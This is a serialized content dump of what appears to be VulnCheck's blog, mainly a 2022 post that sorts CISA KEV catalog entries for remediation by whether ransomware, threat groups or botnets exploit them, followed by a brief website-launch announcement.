{color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sQgqH, html code.shiki .sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}html pre.shiki code .shWJe, html code.shiki .shWJe{--shiki-light:#F76D47;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sHsBP, html code.shiki .sHsBP{--shiki-light:#E53935;--shiki-default:#22863A;--shiki-dark:#85E89D;--shiki-sepia:#F92672}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .syw9h, html code.shiki .syw9h{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#24292E;--shiki-default-font-style:inherit;--shiki-dark:#E1E4E8;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}",{"title":219,"searchDepth":220,"depth":220,"links":118371},[118372,118373,118374,118375,118376],{"id":116327,"depth":220,"text":116328},{"id":117101,"depth":220,"text":117102},{"id":117501,"depth":220,"text":117502},{"id":117574,"depth":220,"text":117575},{"id":118359,"depth":220,"text":118360},"An examination of vulnerabilities affecting Xiongmai IoT devices, including exploit development and an analysis of exploitation in the wild.",{"slug":118379,"category":115663},"xiongmai-iot-exploitation","\u002Fblog\u002Fxiongmai-iot-exploitation",{"title":81971,"description":118377},"blog\u002Fxiongmai-iot-exploitation",[23275,1279],"dHV_Kl8Iz245OSrVTRhRgqI_UGuA5Qick7DoJrNjpfw",{"id":118386,"title":107335,"articles":7,"authors":118387,"body":118389,"date":118742,"description":118743,"extension":234,"image":7,"link":7,"meta":118744,"navigation":237,"path":118746,"seo":118747,"series":7,"stem":118748,"subtype":7,"tags":118749,"__hash__":118750},"blog\u002Fblog\u002Fkev-prioritization.md",[118388],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":118390,"toc":118732},[118391,118406,118412,118416,118431,118444,118449,118453,118471,118478,118481,118491,118503,118523,118531,118534,118547,118551,118553,118556,118561,118565,118568,118573,118577,118604,118610,118614,118621,118635,118638,118642,118666,118684,118688,118691,118710,118712,118725,118729],[18,118392,118393,118394,118397,118398,118405],{},"The [CISA Known Exploited Vulnerabilities (KEV) Catalog](",[47,118395,82007],{"href":82007,"rel":118396},[51],"; tracks vulnerabilities that have been exploited in the wild, and it currently has more than 850 entries. New entries are added to the Catalog at a regular clip, but as the Catalog continues to grow, it's become increasingly difficult for those not bound to the ",[1131,118399,118400],{},[47,118401,118404],{"href":118402,"rel":118403},"https:\u002F\u002Fwww.cisa.gov\u002Fbinding-operational-directive-22-01",[51],"Binding Operational Directive 22-01"," to determine the significance of each KEV entry and how they should be prioritized for remediation.",[18,118407,118408,118409,118411],{},"In this blog, we'll tackle the KEV prioritization problem head-on. We'll identify a small subset of KEV entries that should be remediated now because they pose the highest risk. Then we'll identify another group of high risk KEV entries that should be remediated next. We'll achieve this prioritization by identifying ",[1131,118410,106141],{}," is exploiting these vulnerabilities.",[1920,118413,118415],{"id":118414},"focusing-on-initial-access","Focusing on Initial Access",[18,118417,118418,118419,118424,118425,118430],{},"Local vulnerabilities make up 23% of the KEV Catalog. Attackers exploit local vulnerabilities to ",[47,118420,118423],{"href":118421,"rel":118422},"https:\u002F\u002Fattack.mitre.org\u002Ftactics\u002FTA0004\u002F",[51],"escalate privileges"," or trigger ",[47,118426,118429],{"href":118427,"rel":118428},"https:\u002F\u002Fattack.mitre.org\u002Ftechniques\u002FT1566\u002F",[51],"phishing"," payloads. But these vulnerabilities are only useful if the attacker has already breached a network or tricked a user into interacting with malicious content.",[18,118432,118433,118434,118439,118440,118443],{},"Far more concerning are remote vulnerabilities that don't require authentication or user interaction. When used against ",[47,118435,118438],{"href":118436,"rel":118437},"https:\u002F\u002Fattack.mitre.org\u002Ftechniques\u002FT1190\u002F",[51],"public-facing systems",", these kind of vulnerabilities are great ",[47,118441,2942],{"href":41541,"rel":118442},[51]," vectors. Attackers that exploit public-facing systems are often able to use the exploited system as a beachhead into the victim's internal network. Obviously, that's a great position for an attacker and very dangerous situation for the victim. And given that high value, it's unsurprising that initial access vulnerabilities make up about 37% of the KEV Catalog.",[1925,118445,118446],{},[18,118447,118448],{},"CISA KEV Catalog Sorted By Vulnerability Type",[78559,118450],{":labels":118451,":values":118452},"[\"Initial Access\",\"Credentialed Initial Access\",\"Information Leak\",\"Denial of Service\",\"Client-Side\",\"Local\",\"Other\"]","[36.7,9.3,4,3.9,30.2,14.8,1.1]",[18,118454,118455,118456,1246,118461,118466,118467,59],{},"These types of public-facing initial access vulnerabilities can also be exploited at scale. That's especially useful when the attacker's business model relies on volume. Recent examples of mass exploitation of initial access vulnerabilities include Confluence's ",[47,118457,118460],{"href":118458,"rel":118459},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-26134",[51],"CVE-2022-26134",[47,118462,118465],{"href":118463,"rel":118464},"https:\u002F\u002Fwww.mandiant.com\u002Fresources\u002Fblog\u002Fmobileiron-log4shell-exploitation",[51],"log4shell",", and the ",[47,118468,118470],{"href":91971,"rel":118469},[51],"ProxyShell vulnerabilities",[18,118472,118473,118474,118477],{},"So it's clear that internet accessible vulnerabilities pose a serious risk. A risk that ",[1131,118475,118476],{},"exceeds"," other attack vectors. Both phishing and social engineering also pose significant risk, but those vectors rely on human behavior and have a slew of other mitigations outside of the vulnerability management process. As such, prioritizing the remediation of initial access vulnerabilities, over all others, is a reasonable method to reduce risk via vulnerability management.",[18,118479,118480],{},"Focusing on initial access vulnerabilities also allows us to de-prioritize more than 60% of the KEV Catalog. That's a good start, but still an unwieldy number of issues. Let's reduce the list even further!",[61,118482,118484,982,118487,118490],{"id":118483},"who-and-why-matters",[1131,118485,118486],{},"Who",[1131,118488,118489],{},"Why"," Matters",[18,118492,118493,118494,118496,118497,118499,118500,118502],{},"Treating every exploited-in-the-wild vulnerability as if they represent the same amount of risk is obviously incorrect. Knowing ",[1131,118495,106141],{}," is doing the exploitation and ",[1131,118498,13220],{}," are crucial in determining that risk. While the KEV Catalog doesn't provide these details, the VulnCheck Vulnerability Intelligence Feed ",[1131,118501,4563],{},". Based on our intelligence, we can sort the KEV Catalog's initial access vulnerabilities into six groups, descending in priority:",[1789,118504,118505,118508,118511,118514,118517,118520],{},[25,118506,118507],{},"Vulnerabilities used by ransomware",[25,118509,118510],{},"Vulnerabilities used by advanced threat groups",[25,118512,118513],{},"Vulnerabilities used by botnets",[25,118515,118516],{},"Vulnerabilities with weaponized exploits but no publicly reported exploitation",[25,118518,118519],{},"Vulnerabilities with proof of concept exploits but no publicly reported exploitation",[25,118521,118522],{},"Vulnerabilities with neither an exploit or publicly reported exploitation details",[18,118524,118525,118526,118530],{},"The preceding list attempts to sort the vulnerabilities by risk. Ransomware vulnerabilities pose the most risk because exploitation can rapidly halt business operations, cost thousands to millions of dollar, and even ",[47,118527,85160],{"href":118528,"rel":118529},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Flincoln-college-to-close-after-157-years-due-ransomware-attack\u002F",[51]," the victim's business. Remediating vulnerabilities known to be used by ransomware should be a vulnerability management program's top priority.",[18,118532,118533],{},"Vulnerabilities used by advanced threat groups and botnets pose the next highest risk because they can result in data loss, intellectual property loss, and significant reputational harm. Ideally, these vulnerabilities would be prioritized next.",[18,118535,118536,118537,118540,118541,118543,118544,118546],{},"The remaining vulnerabilities only pose a high ",[1131,118538,118539],{},"potential"," risk. Many of these vulnerabilities have public exploits, but have no reliable reporting tying them to ransomware, advanced threat groups, or botnets. Their inclusion in the KEV Catalog ",[1131,118542,4563],{}," indicate they may have been used somewhere, but the lack of further details implies a very small scale exploitation or low impact results for the attacker. These vulnerabilities shouldn't necessarily be ignored, but they don't rank compared to vulnerabilities that ",[1131,118545,1133],{}," known to be impactful.",[1920,118548,118550],{"id":118549},"the-breakdown","The Breakdown",[993,118552,331],{"id":91950},[18,118554,118555],{},"Breaking down the initial access vulnerabilities in the KEV Catalog and sorting them into the various groups mentioned in the previous section results in the following chart:",[1925,118557,118558],{},[18,118559,118560],{},"CISA KEV Initial Access Vulnerabilities Sorted By Highest Risk",[78559,118562],{":labels":118563,":values":118564},"[\"Ransomware\",\"Named Threat Actor\",\"Botnet\",\"Mature Exploit\",\"Proof of Concept Exploit\",\"Limited Information\"]","[33.5,16.3,14.7,23.3,7.1,5.1]",[18,118566,118567],{},"The graph shows that the immediate priority, ransomware vulnerabilities, only make up 34% of the KEV Catalog Initial Access vulnerabilities. That's about 100 vulnerabilities. A significant reduction from the more than 850 we started with. But, some of the 100 vulnerabilities are quite old, so we looked at further reducing this number based on age.",[1925,118569,118570],{},[18,118571,118572],{},"Ransomware Vulnerabilities by Year",[11128,118574],{":labels":118575,":values":118576},"[2010,2011,2012,2013,2014,2015,2016,2017,2018,2019,2020,2021,2022]","[2,0,5,6,2,5,3,11,14,16,10,26,6]",[18,118578,118579,118580,118585,118586,118591,118592,118594,118595,982,118599,118603],{},"However, we quickly found most of them are still relevant. Take for example, the oldest vulnerability in the list, JBoss's ",[47,118581,118584],{"href":118582,"rel":118583},"https:\u002F\u002Fcve.mitre.org\u002Fcgi-bin\u002Fcvename.cgi?name=cve-2010-0738",[51],"CVE-2010-0738",". Although this vulnerability has been public for over a decade, has been presented in ",[47,118587,118590],{"href":118588,"rel":118589},"https:\u002F\u002Fowasp.org\u002Fwww-pdf-archive\u002FOWASP3011_Luca.pdf",[51],"talks",", and has a quite a few public exploits, we can ",[295,118593,103898],{}," find likely vulnerable targets on both ",[47,118596,65549],{"href":118597,"rel":118598},"https:\u002F\u002Fwww.google.com\u002Fsearch?q=intitle%3A%E2%80%9DJBoss+Management+Console+%E2%80%93+Server+Information%E2%80%9D+%E2%80%9Capplication+server%E2%80%9D+inurl%3A%E2%80%9Dweb-console%E2%80%9D+OR+inurl%3A%E2%80%9Djmx-console%E2%80%9D",[51],[47,118600,41731],{"href":118601,"rel":118602},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=%2B%22SVNTag%3DJBoss%22+%2Bhtml%3A%22%2Fjmx-console%2F%22++title%3A%22Welcome+to+JBoss%22",[51],". For whatever reason, it seems like a lot of these 100 vulnerabilities are hanging around the internet still, which means we have to keep them in our prioritization list.",[18,118605,118606],{},[68,118607],{":width":10862,"alt":118608,"src":118609},"shodan_jboss","https:\u002F\u002Fuser-images.githubusercontent.com\u002F113205286\u002F192303149-3561edbd-9038-424c-86be-0e2b2068f553.png",[993,118611,118613],{"id":118612},"advanced-threat-groups-and-botnets","Advanced Threat Groups and Botnets",[18,118615,118616,118617,118620],{},"Vulnerabilities used by advanced threat groups and botnets represent 16% and 15% of the KEV Catalog initial access vulnerabilities. Interestingly, the vulnerabilities in these category could typically be used by ransomware crews, but, for whatever reason, simply aren't. For example, ",[47,118618,92074],{"href":92072,"rel":118619},[51]," is a widely exploited vulnerability affecting F5 BigIP, but we have no intelligence suggesting it was abused by ransomware (at the time of writing).",[18,118622,118623,118624,982,118629,118634],{},"The botnet category is more likely to contain IoT-based vulnerabilities such as ",[47,118625,118628],{"href":118626,"rel":118627},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-26258",[51],"CVE-2022-26258",[47,118630,118633],{"href":118631,"rel":118632},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2019-3929",[51],"CVE-2019-3929",". Again, these vulnerabilities can provide access into victim networks but they seem to be used mostly by botnets like Mirai variants like Moobot.",[18,118636,118637],{},"Remediating ransomware vulnerabilities is important, but it should be kept in mind that many of the vulnerabilities in this category can be picked up by a ransomware crews at any time. And, of course, as discussed earlier, advanced threat groups and botnets also pose a significant risk. This category is a great \"next\" if your vulnerability management program has caught up on all known ransomware vectors.",[993,118639,118641],{"id":118640},"exploits-exists","Exploits Exists",[18,118643,118644,118645,118647,118648,118653,118654,118659,118660,118662,118663,118665],{},"Vulnerabilities used by ransomware, advanced threat groups, and botnets pose a real and immediate risk, but those vulnerabilities only make up about half of the initial access vulnerabilities in the KEV Catalog. The remaining vulnerabilities are only ",[1131,118646,118539],{}," risks because there is no reliable public reporting about their use in the wild. The potential risk is variable though. For example, ",[47,118649,118652],{"href":118650,"rel":118651},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2020-4427",[51],"CVE-2020-4427"," has a fully weaponized public exploit in the ",[47,118655,118658],{"href":118656,"rel":118657},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fblob\u002F1499b1988e0f6c6cb541e715cf7a3dc43d5563f3\u002Fmodules\u002Fexploits\u002Flinux\u002Fhttp\u002Fibm_drm_rce.rb",[51],"Metasploit Framework",". Metasploit is an open source advanced exploitation tool, and anyone can use it. There is nothing stopping attackers from using the Metasploit module for CVE-2020-4427 on public-facing server. But there is no reporting that any group has. So that's a clear high ",[1131,118661,118539],{}," risk, but it doesn't reach the level of a ",[1131,118664,103548],{}," high risk.",[18,118667,118668,118669,118674,118675,118680,118681,118683],{},"Even lower on our risk assessment are vulnerabilities that only have proof of concept exploits. For example, ",[47,118670,118673],{"href":118671,"rel":118672},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-40870",[51],"CVE-2021-40870"," has a handful of public proof of concept exploits, including a ",[47,118676,118679],{"href":118677,"rel":118678},"https:\u002F\u002Fwearetradecraft.com\u002Fadvisories\u002Ftc-2021-0002\u002F",[51],"curl-based exploit"," published by the vulnerability discoverer. Again, anyone can use these exploits but they lack the true weaponization we expect from real real-world exploit kits. An attacker would need to take on some work in order to integrate the proof of concept exploits into their tool belt. A such, these are more of a medium ",[1131,118682,118539],{}," risk and are far less likely to see any type of exploitation at scale.",[993,118685,118687],{"id":118686},"no-exploit-no-reliable-reporting","No Exploit. No Reliable Reporting",[18,118689,118690],{},"The final grouping of vulnerabilities in our prioritization list are the vulnerabilities that don't have a known exploit and there's no public information regarding use in-the-wild. While KEV Catalog entries should always be taken seriously, the lack of contextualization around these vulnerabilities makes them very difficult to prioritize. Given the lack of details, it's assumed these vulnerabilities are either not being actively exploited or they were used in targeted attacks against a minimal amount of targets.",[18,118692,118693,118694,118699,118700,118705,118706,118709],{},"An example of an entry in this group is ",[47,118695,118698],{"href":118696,"rel":118697},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-37415",[51],"CVE-2021-37415",", affecting ManageEngine ServiceDesk Plus. While ManageEngine software is certainly ",[47,118701,118704],{"href":118702,"rel":118703},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fstate-hackers-breach-defense-energy-healthcare-orgs-worldwide\u002F",[51],"familiar"," to a wide array of attackers, this particular issue has almost no associated information. Keeping ManageEngine software up to date is obviously a good thing, but it shouldn't take precedence over vulnerabilities that we ",[1131,118707,118708],{},"know"," are being exploited.",[1920,118711,1903],{"id":1902},[18,118713,118714,118715,118719,118720,982,118722,118724],{},"The CISA KEV Catalog contains hundreds of vulnerabilities that pose serious risk. But the Catalog lacks prioritization and, as it continues to grow, becomes increasingly unwieldy for security practitioners to use for remediation purposes. In this blog, we were able to identify approximately 10% of the KEV Catalog vulnerabilities as requiring immediate remediation, a number that is far more manageable for practitioners. We also identified an additional 16% of vulnerabilities that should be considered as the ",[47,118716,25220],{"href":118717,"rel":118718},"https:\u002F\u002Fdale-peterson.com\u002F2019\u002F02\u002F14\u002Fics-security-patching-never-next-now\u002F",[51]," vulnerabilities to remediate. We were able to achieve using vulnerability intelligence to determine ",[1131,118721,106141],{},[1131,118723,13220],{}," these vulnerabilities are being exploited.",[61,118726,118728],{"id":118727},"about-the-data","About the Data",[18,118730,118731],{},"The data presented in this blog was produced using the VulnCheck Vulnerability Intelligence Feed. The data was compiled on November 14, 2022.",{"title":219,"searchDepth":220,"depth":220,"links":118733},[118734,118741],{"id":118483,"depth":220,"text":118735,"children":118736},"Who and Why Matters",[118737,118738,118739,118740],{"id":91950,"depth":1266,"text":331},{"id":118612,"depth":1266,"text":118613},{"id":118640,"depth":1266,"text":118641},{"id":118686,"depth":1266,"text":118687},{"id":118727,"depth":220,"text":118728},"2022-11-14","The CISA Known Exploited Vulnerabilities (KEV) Catalog tracks vulnerabilities that have been exploited in the wild, and it currently has more than 800 entries.",{"slug":118745},"kev-prioritization","\u002Fblog\u002Fkev-prioritization",{"title":107335,"description":118743},"blog\u002Fkev-prioritization",[1279],"RbuvzpJIs27aXZPqy8ZL5ya5VrX4mKhSwd7OR3rL8S4",{"id":118752,"title":118753,"articles":7,"authors":118754,"body":118757,"date":118767,"description":118768,"extension":234,"image":7,"link":7,"meta":118769,"navigation":237,"path":118771,"seo":118772,"series":7,"stem":118773,"subtype":7,"tags":7,"__hash__":118774},"blog\u002Fblog\u002Fwebsite-launch.md","Website Launch",[118755],{"name":69301,"avatar":118756},"https:\u002F\u002Fvulncheck.com\u002Flogo.png",{"type":15,"value":118758,"toc":118765},[118759,118762],[18,118760,118761],{},"Since starting VulnCheck in the early days of the pandemic, we've kept a low profile. Early on, we had the opportunity to work with some great customers, to solve some of the toughest problems in Cybersecurity, and it required absolute focus.",[18,118763,118764],{},"As we've been consistently growing our customer base quarter of quarter for awhile now, it felt appropriate to get the website launched, and to start telling the world more about the problems we're solving at VulnCheck. If you're an organization struggling with vulnerability prioritization and staying on top of the latest vulnerabilities, reach out to VulnCheck today.",{"title":219,"searchDepth":220,"depth":220,"links":118766},[],"2022-11-12","We've been around, supporting our customers since 2021, but only recently launched our website.",{"slug":118770},"website-launch","\u002Fblog\u002Fwebsite-launch",{"title":118753,"description":118768},"blog\u002Fwebsite-launch","EfoFeau3__R0jApOcFeuDoroqXnUWMmgadlvEgEIRjc",1781040387428]